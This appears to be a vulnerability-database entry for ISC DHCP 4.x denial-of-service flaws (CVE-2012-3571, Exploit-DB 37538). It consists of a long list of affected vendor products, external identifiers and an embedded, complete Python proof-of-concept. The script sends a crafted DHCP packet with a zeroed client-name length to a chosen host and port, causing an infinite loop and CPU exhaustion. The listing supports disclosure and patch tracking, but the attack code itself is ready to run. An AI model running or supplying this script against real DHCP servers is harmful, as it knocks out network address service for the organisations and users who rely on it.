ID
VAR-E-201104-0002
CVE
cve_id: | CVE-2012-3571 | Trust: 2.4 |
cve_id: | CVE-2012-3570 | Trust: 0.3 |
cve_id: | CVE-2012-3954 | Trust: 0.3 |
cve_id: | CVE-2011-0997 | Trust: 0.3 |
EDB ID
37538
TITLE
ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities - Linux dos Exploit
Trust: 0.6
DESCRIPTION
ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities. CVE-2012-3571CVE-84255 . dos exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | isc | model: | dhcp | scope: | eq | version: | 4.x | Trust: 1.0 |
vendor: | slackware | model: | linux x86 64 -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.2 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.1 | Trust: 0.6 |
vendor: | slackware | model: | linux -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux workstation optional | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server optional | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop workstation client | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server x86 64 | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | juniper | model: | ctpview | scope: | eq | version: | 7.3 | Trust: 0.6 |
vendor: | juniper | model: | ctpview 7.1r2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | juniper | model: | ctpview 7.1r1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.6 |
vendor: | juniper | model: | ctpview 7.3r1 | scope: | ne | version: | - | Trust: 0.6 |
vendor: | juniper | model: | ctpview 7.1r3 | scope: | ne | version: | - | Trust: 0.6 |
vendor: | avaya | model: | aura conferencing standard | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | sc | model: | dhcp | scope: | eq | version: | 4.1.2 | Trust: 0.5 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 11.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 11.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.04 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.4 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.3 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.2 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2011 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2011 | Trust: 0.3 |
vendor: | isc | model: | dhcp server | scope: | eq | version: | 4.2.3 | Trust: 0.3 |
vendor: | isc | model: | dhcp server | scope: | eq | version: | 4.2.2 | Trust: 0.3 |
vendor: | isc | model: | dhcp server | scope: | eq | version: | 4.1.2 | Trust: 0.3 |
vendor: | isc | model: | dhcp server | scope: | eq | version: | 4.2.4 | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.2.0-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp server | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.1-esv-r5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.1-esv-r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.1-esv-r3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.1-esv-r1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | ip office server edition | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | avaya | model: | aura experience portal | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | avaya | model: | aura experience portal sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura experience portal | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.2.4-p1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp server 4.1-esv-r6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | avaya | model: | ip office server edition | scope: | ne | version: | 9.0 | Trust: 0.3 |
vendor: | avaya | model: | aura experience portal sp2 | scope: | ne | version: | 6.0 | Trust: 0.3 |
vendor: | vmware | model: | esx server | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
vendor: | vmware | model: | esx server | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | vmware | model: | esx server | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | vmware | model: | esx server | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | vmware | model: | esx | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | vmware | model: | esx | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | vmware | model: | esx | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lpia | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux | scope: | eq | version: | 9.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts lpia | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sp3 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sp2 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 10.2 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | s u s e | model: | opensuse | scope: | eq | version: | 11.4 | Trust: 0.3 |
vendor: | s u s e | model: | opensuse | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | s u s e | model: | opensuse | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | s u s e | model: | open-enterprise-server | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | s u s e | model: | novell linux pos | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux ws | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux es | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux es | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux as | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux as | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop version | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | pardus | model: | linux | scope: | eq | version: | 20090 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 5.0.2 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 4.0.2 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 4.0.1 | Trust: 0.3 |
vendor: | netbsd | model: | current | scope: | - | version: | - | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | netbsd | model: | rc3 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | netbsd | model: | beta2 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | netbsd | model: | 4,0 beta | scope: | - | version: | - | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2010.1 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2010.1 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2010.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2010.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | mandrakesoft | model: | corporate server x86 64 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | mandrakesoft | model: | corporate server | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 3.0.4 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc9 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc8 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc7 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc6 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc5 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc4 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc3 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc2 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc14 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc13 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc12 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc11 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc10 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc1 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc4 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd rc12 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd pl2 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd pl1 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd b2pl9 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd b2pl23 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd 4.1.1-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd 4.0.2-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd 4.0.1p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | isc | model: | dhcpd 3.0.5b1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd 3.0.2rc1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client b1pl17 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcp client b1pl14 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcp client b1 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.1.1-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.1.0p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.0.2-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.0.1p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | isc | model: | dhcp client 3.1.2p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | hp | model: | insight control for linux | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux mipsel | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux m68k | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux hppa | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux armel | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux alpha | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | debian | model: | linux | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | citrix | model: | xenserver sp2 | scope: | eq | version: | 5.6 | Trust: 0.3 |
vendor: | citrix | model: | xenserver feature pack | scope: | eq | version: | 5.61 | Trust: 0.3 |
vendor: | citrix | model: | xenserver common criteria | scope: | eq | version: | 5.6 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 5.6 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 5.5 | Trust: 0.3 |
vendor: | citrix | model: | xenserver update | scope: | eq | version: | 5.03 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server | scope: | eq | version: | 5.2.8 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server | scope: | eq | version: | 5.2.2 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server sp3 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server sp2 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server sp2 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server sp1 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | messaging storage server | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2.3 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp2 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | iq | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | iq | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | iq | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system platform sp3 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system platform sp2 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system platform | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system platform | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.2.3 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura conferencing sp1 standard | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura conferencing | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | eq | version: | 7.5.2 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | eq | version: | 7.5 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | eq | version: | 7.4.2 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | eq | version: | 7.4.1 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | apple | model: | airport express base station with 802.11n | scope: | eq | version: | 7.5.2 | Trust: 0.3 |
vendor: | apple | model: | airport express base station with 802.11n | scope: | eq | version: | 7.4.1 | Trust: 0.3 |
vendor: | isc | model: | dhcpd 4.2.1-p1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd 4.1-esv-r2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcpd 3.1-esv-r1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.2.1-p1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client 4.1-esv-r2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | isc | model: | dhcp client 3.1-esv-r1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | ne | version: | 5.2.4 | Trust: 0.3 |
vendor: | avaya | model: | ip office application server | scope: | ne | version: | 8.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | ne | version: | 6.3 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | ne | version: | 6.1.2 | Trust: 0.3 |
vendor: | apple | model: | time capsule | scope: | ne | version: | 7.6 | Trust: 0.3 |
vendor: | apple | model: | airport express base station with 802.11n | scope: | ne | version: | 7.6 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/54665/info
ISC DHCP is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.
#!/usr/bin/python
'''
SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
service(infinite loop and CPU consumption/chew) via zero'ed client name length
http://www.k1p0d.com
'''
import socket
import getopt
from sys import argv
def main():
args = argv[1:]
try:
args, useless = getopt.getopt(args, 'p:h:')
args = dict(args)
args['-p']
args['-h']
except:
usage(argv[0])
exit(-1)
dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x22\x5f\xae'
'\xa7\xdf\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x63\x82\x53\x63'
'\x35\x01\x03\x32\x04\x0a\x00\x00'
'\x01\x0c\x00'
'\x37\x0d\x01\x1c\x02\x03\x0f'
'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
'\xff\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((args['-h'], int(args['-p'])))
sock.sendall(dhcp_req_packet)
print 'Packet sent'
sock.close()
def usage(pyname):
print '''
Usage: %s -h <host> -p <port>
''' % pyname
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Denial of Service Vulnerabilities
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Markus Hietava
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2012-3571 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 37538 | Trust: 1.9 |
db: | BID | id: | 54665 | Trust: 1.9 |
db: | JUNIPER | id: | JSA10761 | Trust: 0.6 |
db: | EDBNET | id: | 58746 | Trust: 0.6 |
db: | PACKETSTORM | id: | 115094 | Trust: 0.5 |
db: | NVD | id: | CVE-2012-3570 | Trust: 0.3 |
db: | NVD | id: | CVE-2012-3954 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-0997 | Trust: 0.3 |
